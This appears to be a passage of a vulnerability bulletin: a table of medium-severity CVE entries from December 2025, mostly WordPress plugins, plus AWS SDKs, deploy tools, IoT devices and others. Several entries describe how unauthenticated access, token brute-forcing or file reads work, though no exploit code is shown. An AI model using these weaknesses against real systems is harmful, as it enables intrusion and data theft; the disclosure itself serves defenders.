| ultimatemember--Ultimate Member User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin | The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.11.0 via the ajax_get_members function. This is due to the use of a predictable low-entropy token (5 hex characters derived from md5 of post ID) to identify member directories and insufficient authorization checks on the unauthenticated AJAX endpoint. This makes it possible for unauthenticated attackers to extract sensitive data including usernames, display names, user roles (including administrator accounts), profile URLs, and user IDs by enumerating predictable directory_id values or brute-forcing the small 16^5 token space. | 2025-12-20 | 5.3 | CVE-2025-12492 | https://www.wordfence.com/threat-intel/vulnerabilities/id/61337d2d-d15a-45f2-b730-fc034eb3cd31?source=cve https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/templates/members.php#L26 https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-ajax-common.php#L61 https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-member-directory.php#L2795 https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-member-directory.php#L205 https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/class-functions.php#L41 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3421362%40ultimate-member%2Ftrunk&old=3408617%40ultimate-member%2Ftrunk&sfp_email=&sfph_mail= |
| wedevs--Dokan Pro | The Dokan Pro plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the `/dokan/v1/wholesale/register` REST API endpoint in all versions up to, and including, 4.1.3. This makes it possible for unauthenticated attackers to enumerate users and retrieve their email addresses via the REST API by providing a user ID, along with other information such as usernames, display names, user roles, and registration dates. | 2025-12-16 | 5.3 | CVE-2025-12809 | https://www.wordfence.com/threat-intel/vulnerabilities/id/534557b0-16d2-4a77-a118-b66fc7474ecf?source=cve https://dokan.co/wordpress/changelog/ |
| lbell--Pretty Google Calendar | The Pretty Google Calendar plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the pgcal_ajax_handler() function in all versions up to, and including, 2.0.0. This makes it possible for unauthenticated attackers to retrieve the Google API key set in the plugin's settings. | 2025-12-20 | 5.3 | CVE-2025-12898 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b3c15924-d430-48e3-9804-fa83605b9c24?source=cve https://wordpress.org/plugins/pretty-google-calendar/ |
| radykal--Fancy Product Designer | The Fancy Product Designer plugin for WordPress is vulnerable to Information Disclosure in all versions up to, and including, 6.4.8. This is due to insufficient validation of user-supplied input in the 'url' parameter of the fpd_custom_uplod_file AJAX action, which flows directly into the getimagesize() function without sanitization. While direct exploitation via PHP filter chains is blocked on PHP 8+ due to a separate code bug in the plugin, the vulnerability can be exploited via a TOCTOU race condition (CVE-2025-13231) also present in the same plugin, or may be directly exploitable on PHP 7.x installations. This makes it possible for unauthenticated attackers to read arbitrary sensitive files from the server, including wp-config.php. | 2025-12-16 | 5.9 | CVE-2025-13439 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4fd6df9d-2963-44b1-bc4e-e53eda97a2a9?source=cve https://support.fancyproductdesigner.com/support/discussions/topics/13000036024 |
| IBM--UCD - IBM DevOps Deploy | IBM UCD - IBM DevOps Deploy 8.1 through 8.1.2.3 Deploy transmits data in clear text that could allow an attacker to obtain sensitive information using man in the middle techniques. | 2025-12-15 | 5.9 | CVE-2025-13489 | https://www.ibm.com/support/pages/node/7254662 |
| croixhaug--Appointment Booking Calendar Simply Schedule Appointments Booking Plugin | The Appointment Booking Calendar - Simply Schedule Appointments Booking Plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.9.16. This is due to the plugin exposing its admin embed endpoint at `/wp-json/ssa/v1/embed-inner-admin` without authentication, which leaks plugin settings including staff names, business names, and configuration data that are not publicly displayed on the booking form. This makes it possible for unauthenticated attackers to extract private business configuration. In premium versions with integrations configured, this might also expose other sensitive data including API keys for external services. | 2025-12-19 | 5.3 | CVE-2025-13754 | https://www.wordfence.com/threat-intel/vulnerabilities/id/10d7a50c-41e9-41b7-a171-d72dbe08e7b7?source=cve https://plugins.trac.wordpress.org/changeset/3421427/simply-schedule-appointments/trunk/includes/class-shortcodes.php |
| onesignal--OneSignal Web Push Notifications | The OneSignal - Web Push Notifications plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the settings handling functionality in all versions up to, and including, 3.6.1. This is due to the plugin processing POST requests without verifying user capabilities or nonces. This makes it possible for unauthenticated attackers to overwrite the OneSignal App ID, REST API key, and notification behavior via direct POST requests. | 2025-12-15 | 5.3 | CVE-2025-13950 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cf2b5d05-24a3-4bc8-9dde-a7e8ce13ea16?source=cve https://github.com/OneSignal/OneSignal-WordPress-Plugin/pull/387/files |
| thimpress--LearnPress WordPress LMS Plugin | The LearnPress - WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the statistic function in all versions up to, and including, 4.3.1. This makes it possible for unauthenticated attackers to view the plugin's order statistics, including total revenue summaries and order status counts. | 2025-12-16 | 5.3 | CVE-2025-13956 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c4b833c3-818d-4646-bd6d-8b3be13ea0f1?source=cve https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.1/inc/rest-api/v1/frontend/class-lp-rest-orders-controller.php#L36 |
| LINE Corporation--LINE client for Android | LINE client for Android versions prior to 14.20 contains a UI spoofing vulnerability in the in-app browser where the full-screen security Toast notification is not properly re-displayed when users return from another application, potentially allowing attackers to conduct phishing attacks by impersonating legitimate interfaces. | 2025-12-15 | 5.4 | CVE-2025-14020 | https://hackerone.com/reports/2547989 |
| tainacan--Tainacan | The Tainacan plugin for WordPress is vulnerable to unauthorized metadata section creation due to missing authorization checks in all versions up to, and including, 1.0.1. This is due to the `create_item_permissions_check()` function unconditionally returning true, which bypasses authentication and authorization validation. This makes it possible for unauthenticated attackers to create arbitrary metadata sections for any collection via the public REST API granted they can access the WordPress site. | 2025-12-21 | 5.3 | CVE-2025-14043 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5596a0f0-6bfe-4c6e-a0d6-117e13117098?source=cve https://plugins.trac.wordpress.org/browser/tainacan/trunk/classes/api/endpoints/class-tainacan-rest-metadata-sections-controller.php#L363 https://plugins.trac.wordpress.org/browser/tainacan/tags/1.0.1/classes/api/endpoints/class-tainacan-rest-metadata-sections-controller.php#L363 |
| wplegalpages--Cookie Banner, Cookie Consent, Consent Log, Cookie Scanner, Script Blocker (for GDPR, CCPA & ePrivacy) : WP Cookie Consent | The Cookie Banner, Cookie Consent, Consent Log, Cookie Scanner, Script Blocker (for GDPR, CCPA & ePrivacy) : WP Cookie Consent plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the gdpr_delete_policy_data function in all versions up to, and including, 4.0.7. This makes it possible for unauthenticated attackers to permanently delete arbitrary posts, pages, attachments, and other post types by ID. | 2025-12-17 | 5.3 | CVE-2025-14061 | https://www.wordfence.com/threat-intel/vulnerabilities/id/866b4ca8-563f-4a19-bbf7-79a79f07d53d?source=cve https://plugins.trac.wordpress.org/browser/gdpr-cookie-consent/tags/4.0.6/admin/class-gdpr-cookie-consent-admin.php#L8091 https://plugins.trac.wordpress.org/browser/gdpr-cookie-consent/tags/4.0.6/admin/class-gdpr-cookie-consent-admin.php#L8878 |
| wpshuffle--Frontend Post Submission Manager Lite Frontend Posting WordPress Plugin | The Frontend Post Submission Manager Lite plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.2.5. This is due to missing authorization checks on the post update functionality in the fpsml_form_process AJAX action. This makes it possible for unauthenticated attackers to modify arbitrary posts by providing a post_id parameter via the guest posting form, allowing them to change post titles, content, excerpts, and remove post authors. | 2025-12-21 | 5.3 | CVE-2025-14080 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3e9b6514-e727-42fe-8893-a317b71b2760?source=cve https://plugins.trac.wordpress.org/browser/frontend-post-submission-manager-lite/trunk/includes/cores/ajax-process-form.php#L104 https://plugins.trac.wordpress.org/browser/frontend-post-submission-manager-lite/tags/1.2.5/includes/cores/ajax-process-form.php#L104 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3419835%40frontend-post-submission-manager-lite&new=3419835%40frontend-post-submission-manager-lite&sfp_email=&sfph_mail= |
| Radiometer Medical Aps--ABL90 FLEX and ABL90 FLEX PLUS Analyzers | A "Privilege boundary violation" vulnerability is identified affecting multiple Radiometer products. Exploitation of this vulnerability gives a user with physical access to the analyzer the possibility to gain unauthorized access to functionalities outside the restricted environment. The vulnerability is due to a weakness in the design of the access control implementation in the application software. Other related CVEs are CVE-2025-14096 and CVE-2025-14097. Affected customers have been informed about this vulnerability. This CVE is being published to provide transparency. Required configuration for exposure: physical access to the analyzer is needed. Temporary workaround: only authorized people can physically access the analyzer. Permanent solution: local Radiometer representatives will contact all affected customers to discuss a permanent solution. Exploit status: researchers have provided a working proof-of-concept. Radiometer is not aware of any publicly available exploit at the time of publication. Note: CVSS score 6.8 when the underlying OS is Windows 7 or Windows XP, and CVSS score 5.7 when the underlying OS is Windows 8 or Windows 10. | 2025-12-17 | 5.7 | CVE-2025-14095 | https://www.radiometer.com/myradiometer |
| damian-gora--FiboSearch Ajax Search for WooCommerce | The FiboSearch - Ajax Search for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `thegem_te_search` shortcode in all versions up to, and including, 1.32.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This vulnerability requires TheGem theme (premium) to be installed with Header Builder mode enabled, and the FiboSearch "Replace search bars" option enabled for TheGem integration. | 2025-12-20 | 5.4 | CVE-2025-14298 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8149103e-105d-401d-8a15-b07d131baaac?source=cve https://wordpress.org/plugins/ajax-search-for-woocommerce https://plugins.trac.wordpress.org/browser/ajax-search-for-woocommerce/tags/1.32.0/partials/themes/thegem-elementor.php#L94 https://plugins.trac.wordpress.org/browser/ajax-search-for-woocommerce/tags/1.32.0/partials/themes/thegem-elementor.php#L104 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3420841%40ajax-search-for-woocommerce%2Ftrunk&old=3398612%40ajax-search-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=#file136 |
| wpchill--Image Photo Gallery Final Tiles Grid | The Image Photo Gallery Final Tiles Grid plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 3.6.7. This is due to the plugin not properly verifying that a user is authorized to perform actions on gallery management functions. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete, modify, or clone galleries created by any user, including administrators. | 2025-12-19 | 5.4 | CVE-2025-14455 | https://www.wordfence.com/threat-intel/vulnerabilities/id/830663b6-0786-48c7-9ffd-ac3ba2bd3e0c?source=cve https://plugins.trac.wordpress.org/browser/final-tiles-grid-gallery-lite/tags/3.6.7/FinalTilesGalleryLite.php#L528 https://plugins.trac.wordpress.org/browser/final-tiles-grid-gallery-lite/tags/3.6.7/FinalTilesGalleryLite.php#L684 https://plugins.trac.wordpress.org/browser/final-tiles-grid-gallery-lite/tags/3.6.7/FinalTilesGalleryLite.php#L213 https://plugins.trac.wordpress.org/changeset/3417363/final-tiles-grid-gallery-lite/trunk/FinalTilesGalleryLite.php |
| Güralp Systems--Fortimus Series | A vulnerability in the web interface of the Güralp Fortimus Series, Minimus Series and Certimus Series allows an unauthenticated attacker with network access to send specially-crafted HTTP requests that can cause the web service process to deliberately restart. Although this mechanism limits the impact of the attack, it results in a brief denial-of-service condition during the restart. | 2025-12-16 | 5.3 | CVE-2025-14466 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-350-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-350-01.json |
| niao70--F70 Lead Document Download | The F70 Lead Document Download plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'file_download' function in all versions up to, and including, 1.4.4. This makes it possible for unauthenticated attackers to download any file from the WordPress media library by guessing or enumerating WordPress attachment IDs. | 2025-12-20 | 5.3 | CVE-2025-14633 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bba22270-de9b-4651-8180-c077ef113112?source=cve https://plugins.trac.wordpress.org/browser/f70-lead-document-download/trunk/includes/class.download.php#L61 https://plugins.trac.wordpress.org/browser/f70-lead-document-download/tags/1.4.4/includes/class.download.php#L61 |
| Shenzhen Sixun Software--Sixun Shanghui Group Business Management System | A vulnerability was identified in Shenzhen Sixun Software Sixun Shanghui Group Business Management System 4.10.24.3. Affected by this vulnerability is an unknown functionality of the file /api/GylOperator/UpdatePasswordBatch. The manipulation leads to weak password recovery. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 5.3 | CVE-2025-14696 | VDB-336414 - Shenzhen Sixun Software Sixun Shanghui Group Business Management System UpdatePasswordBatch password recovery; VDB-336414 - CTI Indicators (IOB, IOC, TTP, IOA); Submit #705601 - Shenzhen Sixun Software Co., Ltd. Sissyun Shanghui 7 Online Business System 4.10.24.3 Unauthorized; https://github.com/zhangbuneng/Sissyun-Shanghui-7-Unauthorized-password-modificationfication-vulnerability./issues/1 https://github.com/zhangbuneng/Sissyun-Shanghui-7-Unauthorized-password-modificationfication-vulnerability./issues/1#issue-3688839620 |
| Municorn--FAX App | A security vulnerability has been detected in Municorn FAX App 3.27.0 on Android. This vulnerability affects unknown code of the component biz.faxapp.app. Such manipulation leads to path traversal. The attack needs to be performed locally. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 5.3 | CVE-2025-14699 | VDB-336417 - Municorn FAX App biz.faxapp.app path traversal; VDB-336417 - CTI Indicators (IOB, IOC, TTP); Submit #706215 - MUNICORN LIMITED (https://comfax.com/) FAX App: Send Faxes from Phone APP (biz.faxapp.app) Version:V3.27.0 Path Traversal; https://github.com/Secsys-FDU/AF_CVEs/issues/3 |
| Shiguangwu--sgwbox N3 | A vulnerability has been found in Shiguangwu sgwbox N3 2.0.25. The affected element is an unknown function of the file /fsnotify of the component POST Message Handler. The manipulation of the argument token leads to improper authentication. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 5.3 | CVE-2025-14703 | VDB-336420 - Shiguangwu sgwbox N3 POST Message fsnotify improper authentication; VDB-336420 - CTI Indicators (IOB, IOC, IOA); Submit #706914 - sgwbox N3 NAS V2.0.25 Auth Bypass; https://www.notion.so/sgwbox-NAS-N3-Auth-Bypass-2be6cf4e528a8092b261fbc2abc3430c?source=copy_link |
| mansoormunib--RESPONSIVE AND SWIPE SLIDER! | The Responsive and Swipe slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's rsSlider shortcode in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-20 | 5.5 | CVE-2025-14721 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b82e6dce-b130-4025-b6e3-bde2350a6362?source=cve https://plugins.trac.wordpress.org/browser/responsive-and-swipe-slider/trunk/shortcode.php#L100 |
| nestornoe--Amazon affiliate lite Plugin | The Amazon affiliate lite Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on the 'ADAL_settings_page' function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-20 | 5.4 | CVE-2025-14734 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8175ff00-e588-46cf-a743-9c4d4717657a?source=cve https://plugins.trac.wordpress.org/browser/afiliados-de-amazon-lite/trunk/ADAL-core.php?rev=1952216#L99 |
| Ningyuanda--TC155 | A vulnerability was determined in Ningyuanda TC155 57.0.2.0. This affects an unknown function of the file /onvif/device_service of the component ONVIF Device Management Service. Executing manipulation of the argument FactoryDefault with the input Hard can lead to improper access controls. The attack requires access to the local network. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-16 | 5.4 | CVE-2025-14748 | VDB-336521 - Ningyuanda TC155 ONVIF Device Management Service device_service access control; VDB-336521 - CTI Indicators (IOB, IOC, TTP, IOA); Submit #707197 - Shenzhen Ningyuanda Technology Co., Ltd. TC155 IP Camera Firmware version: 57.0.2.0 Unauthenticated Hard Reset via ONVIF SetSystemFactoryDefault; https://github.com/pwnpwnpur1n/IoT-advisories/blob/main/TC155-Unauth-Hard-Reset.md |
| AWS--S3 Encryption Client for .NET | Missing cryptographic key commitment in the Amazon S3 Encryption Client for .NET may allow a user with write access to the S3 bucket to introduce a new EDK that decrypts to different plaintext when the encrypted data key is stored in an "instruction file" instead of S3's metadata record. To mitigate this issue, upgrade Amazon S3 Encryption Client for .NET to version 3.2.0 or later. | 2025-12-17 | 5.3 | CVE-2025-14759 | https://aws.amazon.com/security/security-bulletins/AWS-2025-032/ https://github.com/aws/amazon-s3-encryption-client-dotnet/security/advisories/GHSA-4v42-65r3-3gjx https://github.com/aws/amazon-s3-encryption-client-dotnet/releases/tag/release_2025-12-17 |
| AWS--AWS SDK for C++ | Missing cryptographic key commitment in the AWS SDK for C++ may allow a user with write access to the S3 bucket to introduce a new EDK that decrypts to different plaintext when the encrypted data key is stored in an "instruction file" instead of S3's metadata record. To mitigate this issue, upgrade AWS SDK for C++ to version 1.11.712 or later. | 2025-12-17 | 5.3 | CVE-2025-14760 | https://aws.amazon.com/security/security-bulletins/AWS-2025-032/ https://github.com/aws/aws-sdk-cpp/security/advisories/GHSA-792f-r46x-r7gm https://github.com/aws/aws-sdk-cpp/releases/tag/1.11.712 |
| AWS--AWS SDK for PHP | Missing cryptographic key commitment in the AWS SDK for PHP may allow a user with write access to the S3 bucket to introduce a new EDK that decrypts to different plaintext when the encrypted data key is stored in an "instruction file" instead of S3's metadata record. To mitigate this issue, upgrade AWS SDK for PHP to version 3.368.0 or later. | 2025-12-17 | 5.3 | CVE-2025-14761 | https://aws.amazon.com/security/security-bulletins/AWS-2025-032/ https://github.com/aws/aws-sdk-php/security/advisories/GHSA-x8cp-jf6f-r4xh https://github.com/aws/aws-sdk-php/releases/tag/3.368.0 |
| AWS--AWS SDK for Ruby | Missing cryptographic key commitment in the AWS SDK for Ruby may allow a user with write access to the S3 bucket to introduce a new EDK that decrypts to different plaintext when the encrypted data key is stored in an "instruction file" instead of S3's metadata record. To mitigate this issue, upgrade AWS SDK for Ruby to version 1.208.0 or later. | 2025-12-17 | 5.3 | CVE-2025-14762 | https://aws.amazon.com/security/security-bulletins/AWS-2025-032/ https://github.com/aws/aws-sdk-ruby/security/advisories/GHSA-2xgq-q749-89fq https://rubygems.org/gems/aws-sdk-s3/versions/1.208.0 |
| AWS--S3 Encryption Client for Java | Missing cryptographic key commitment in the Amazon S3 Encryption Client for Java may allow a user with write access to the S3 bucket to introduce a new EDK that decrypts to different plaintext when the encrypted data key is stored in an "instruction file" instead of S3's metadata record. To mitigate this issue, upgrade Amazon S3 Encryption Client for Java to version 4.0.0 or later. | 2025-12-17 | 5.3 | CVE-2025-14763 | https://aws.amazon.com/security/security-bulletins/AWS-2025-032/ https://github.com/aws/amazon-s3-encryption-client-java/security/advisories/GHSA-x44p-gvrj-pj2r https://github.com/aws/amazon-s3-encryption-client-java/releases/tag/v4.0.0 |
| AWS--S3 Encryption Client for Go | Missing cryptographic key commitment in the Amazon S3 Encryption Client for Go may allow a user with write access to the S3 bucket to introduce a new EDK that decrypts to different plaintext when the encrypted data key is stored in an "instruction file" instead of S3's metadata record. To mitigate this issue, upgrade Amazon S3 Encryption Client for Go to version 4.0 or later. | 2025-12-17 | 5.3 | CVE-2025-14764 | https://aws.amazon.com/security/security-bulletins/AWS-2025-032/ https://github.com/aws/amazon-s3-encryption-client-go/security/advisories/GHSA-3g75-q268-r9r6 https://github.com/aws/amazon-s3-encryption-client-go/releases/tag/v4.0.0 |
| ConnectWise--ScreenConnect | In deployments using the ScreenConnect™ Certificate Signing Extension, encrypted configuration values including an Azure Key Vault-related key, could be returned to unauthenticated users through a client-facing endpoint under certain conditions. The values remained encrypted and securely stored at rest; however, an encrypted representation could be exposed in client responses. Updating the Certificate Signing Extension to version 1.0.12 or higher ensures configuration handling occurs exclusively on the server side, preventing encrypted values from being transmitted to or rendered by client-side components. | 2025-12-18 | 5.3 | CVE-2025-14823 | https://www.connectwise.com/company/trust/security-bulletins/2025-12-18-screenconnect-certificate-signing-extension-update |
| Red Hat--Red Hat Advanced Cluster Management for Kubernetes 2 | A flaw was found in Nodemailer. This vulnerability allows a denial of service (DoS) via a crafted email address header that triggers infinite recursion in the address parser. | 2025-12-18 | 5.3 | CVE-2025-14874 | https://access.redhat.com/security/cve/CVE-2025-14874 RHBZ#2418133 https://github.com/nodemailer/nodemailer https://github.com/nodemailer/nodemailer/commit/b61b9c0cfd682b6f647754ca338373b68336a150 https://github.com/nodemailer/nodemailer/security/advisories/GHSA-rcmh-qjqh-p98v |
| Campcodes--Advanced Voting Management System | A security flaw has been discovered in Campcodes Advanced Voting Management System 1.0. The impacted element is an unknown function of the file /admin/voters_edit.php of the component Password Handler. Manipulating the argument ID results in improper authorization. The attack can be carried out remotely. The exploit has been released to the public and may be exploited. | 2025-12-18 | 5.4 | CVE-2025-14889 | VDB-337378 \| Campcodes Advanced Voting Management System Password voters_edit.php improper authorization VDB-337378 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #715643 \| campcodes Advanced Voting Management System using PHP/MySQLi 1.0 Authentication Bypass https://gist.github.com/nikstudy576-maker/82e1e1ede9b848880aa09b87b92bc22c https://www.campcodes.com/ |
| WebAssembly--Binaryen | A vulnerability was determined in WebAssembly Binaryen up to 125. Affected by this issue is the function WasmBinaryReader::readExport of the file src/wasm/wasm-binary.cpp. This manipulation causes a heap-based buffer overflow. It is possible to launch the attack on the local host. The exploit has been publicly disclosed and may be utilized. Patch name: 4f52bff8c4075b5630422f902dd92a0af2c9f398. It is recommended to apply a patch to fix this issue. | 2025-12-19 | 5.3 | CVE-2025-14956 | VDB-337592 \| WebAssembly Binaryen wasm-binary.cpp readExport heap-based overflow VDB-337592 \| CTI Indicators (IOB, IOC, IOA) Submit #717315 \| WebAssembly binaryen 9a226ac Heap-based Buffer Overflow https://github.com/WebAssembly/binaryen/issues/8089 https://github.com/WebAssembly/binaryen/pull/8092 https://github.com/oneafter/1204/blob/main/hbf https://github.com/WebAssembly/binaryen/commit/4f52bff8c4075b5630422f902dd92a0af2c9f398 |
| floooh--sokol | A security flaw has been discovered in floooh sokol up to 33e2271c431bf21de001e972f72da17a984da932. This vulnerability affects the function _sg_pipeline_common_init in the library sokol_gfx.h. Manipulation results in a heap-based buffer overflow. The attack must be carried out locally. The exploit has been released to the public and may be exploited. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The patch is named 33e2271c431bf21de001e972f72da17a984da932. It is suggested to install a patch to address this issue. | 2025-12-19 | 5.3 | CVE-2025-14958 | VDB-337594 \| floooh sokol sokol_gfx.h _sg_pipeline_common_init heap-based overflow VDB-337594 \| CTI Indicators (IOB, IOC, IOA) Submit #717320 \| floooh sokol e0832c9 Heap-based Buffer Overflow https://github.com/floooh/sokol/issues/1406 https://github.com/floooh/sokol/issues/1406#issuecomment-3649515551 https://github.com/oneafter/1212/blob/main/hbf1 https://github.com/seyhajin/sokol/commit/33e2271c431bf21de001e972f72da17a984da932 |
| 1541492390c--yougou-mall | A vulnerability was found in 1541492390c yougou-mall up to 0a771fa817c924efe52c8fe0a9a6658eee675f9f. This impacts the function Upload of the file src/main/java/per/ccm/ygmall/extra/controller/ResourceController.java. Manipulation results in path traversal. This product uses a rolling release to provide continuous delivery. Therefore, no version details for affected or updated releases are available. | 2025-12-19 | 5.5 | CVE-2025-14965 | VDB-337600 \| 1541492390c yougou-mall ResourceController.java upload path traversal VDB-337600 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #717732 \| https://github.com/1541492390c/yougou-mall?tab=readme-ov-file yougou-mall 1.0 Upload any file https://github.com/zyhzheng500-maker/cve/blob/main/yougou-mall%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.md |
| Restajet Information Technologies Inc.--Online Food Delivery System | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Restajet Information Technologies Inc. Online Food Delivery System allows Phishing, Forceful Browsing. This issue affects Online Food Delivery System: through 19122025. | 2025-12-19 | 5.4 | CVE-2025-1885 | https://www.usom.gov.tr/bildirim/tr-25-0469 |
| IBM--UCD - IBM UrbanCode Deploy | IBM UCD - IBM UrbanCode Deploy 7.1 through 7.1.2.27, 7.2 through 7.2.3.20, and 7.3 through 7.3.2.15 and IBM UCD - IBM DevOps Deploy 8.0 through 8.0.1.10, and 8.1 through 8.1.2.3 is susceptible to a race condition in http-session client-IP binding enforcement which may allow a session to be briefly reused from a new IP address before it is invalidated, potentially enabling unauthorized access under certain network conditions. | 2025-12-15 | 5 | CVE-2025-36360 | https://www.ibm.com/support/pages/node/7254661 |
| Elastic--Kibana | Improper neutralization of input during web page generation ('Cross-site Scripting') (CWE-79) allows an authenticated user to render HTML tags within a user's browser via the integration package upload functionality. This issue is related to ESA-2025-17 (CVE-2025-25018) bypassing that fix to achieve HTML injection. | 2025-12-15 | 5.4 | CVE-2025-37732 | https://discuss.elastic.co/t/kibana-8-19-8-9-1-8-and-9-2-2-security-update-esa-2025-28/384064 |
| avahi--avahi | Avahi is a system which facilitates service discovery on a local network via the mDNS/DNS-SD protocol suite. In versions up to and including 0.9-rc2, the simple protocol server ignores the documented client limit and accepts unlimited connections, allowing for easy local DoS. Although `CLIENTS_MAX` is defined, `server_work()` unconditionally `accept()`s and `client_new()` always appends the new client and increments `n_clients`. There is no check against the limit. When a client cannot be accepted because avahi-daemon has reached its maximum socket count, it unconditionally logs an error for each connection. Unprivileged local users can exhaust daemon memory and file descriptors, causing a system-wide denial of service for mDNS/DNS-SD. Exhausting local file descriptors also increases system load because an error is logged for every request. Overloading prevents glibc calls that use the nss-mdns plugins from resolving `*.local.` names and link-local addresses. As of time of publication, no known patched versions are available, but a candidate fix is available in pull request 808, and some workarounds are available. Simple clients are offered for nss-mdns package functionality. It is not possible to disable the unix socket `/run/avahi-daemon/socket`, but resolution requests received via DBus are not affected directly. The tools avahi-resolve, avahi-resolve-address and avahi-resolve-host-name are not affected because they use the DBus interface. It is possible to change the permissions of the unix socket after avahi-daemon is started, but avahi-daemon does not provide any configuration for it. Additional access restrictions such as SELinux can also prevent unwanted tools from accessing the socket while keeping resolution working for trusted users. | 2025-12-18 | 5.5 | CVE-2025-59529 | https://github.com/avahi/avahi/security/advisories/GHSA-73wf-3xmj-x82q https://github.com/avahi/avahi/pull/808 https://zeropath.com/blog/avahi-simple-protocol-server-dos-cve-2025-59529 |
| FreshRSS--FreshRSS | FreshRSS is a free, self-hostable RSS aggregator. Versions prior to 1.27.1 have a logout cross-site request forgery vulnerability that can lead to denial of service via <track src>. Version 1.27.1 patches the issue. | 2025-12-18 | 5.3 | CVE-2025-59949 | https://github.com/FreshRSS/FreshRSS/security/advisories/GHSA-w7f5-8vf9-f966 https://github.com/FreshRSS/FreshRSS/pull/7958 https://github.com/FreshRSS/FreshRSS/pull/7997 https://github.com/FreshRSS/FreshRSS/pull/7999 |
| HCL Software--DevOps Deploy / Launch | HCL DevOps Deploy / HCL Launch is susceptible to a race condition in http-session client-IP binding enforcement which may allow a session to be briefly reused from a new IP address before it is invalidated. This could lead to unauthorized access under certain network conditions. | 2025-12-16 | 5 | CVE-2025-62329 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127332 |
| HCL Software--DevOps Deploy | HCL DevOps Deploy is susceptible to a cleartext transmission of sensitive information because the HTTP port remains accessible and does not redirect to HTTPS as intended. As a result, an attacker with network access could intercept or modify user credentials and session-related data via passive monitoring or man-in-the-middle attacks. | 2025-12-16 | 5.9 | CVE-2025-62330 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127333 |
| Sparkle WP--Construction Light | Missing Authorization vulnerability in Sparkle WP Construction Light allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Construction Light: from n/a through 1.6.7. | 2025-12-18 | 5.4 | CVE-2025-62960 | https://vdp.patchstack.com/database/wordpress/theme/construction-light/vulnerability/wordpress-construction-light-theme-1-6-7-broken-access-control-vulnerability?_s_id=cve |
| Sparkle WP--Sparkle FSE | Missing Authorization vulnerability in Sparkle WP Sparkle FSE allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Sparkle FSE: from n/a through 1.0.9. | 2025-12-18 | 5.4 | CVE-2025-62961 | https://vdp.patchstack.com/database/wordpress/theme/sparkle-fse/vulnerability/wordpress-sparkle-fse-theme-1-0-9-broken-access-control-vulnerability?_s_id=cve |
| WP Messiah--WP AI CoPilot | Insertion of Sensitive Information Into Sent Data vulnerability in WP Messiah WP AI CoPilot allows Retrieve Embedded Sensitive Data. This issue affects WP AI CoPilot: from n/a through 1.2.7. | 2025-12-18 | 5 | CVE-2025-62998 | https://vdp.patchstack.com/database/wordpress/plugin/ai-co-pilot-for-wp/vulnerability/wordpress-wp-ai-copilot-plugin-1-2-7-sensitive-data-exposure-vulnerability?_s_id=cve |
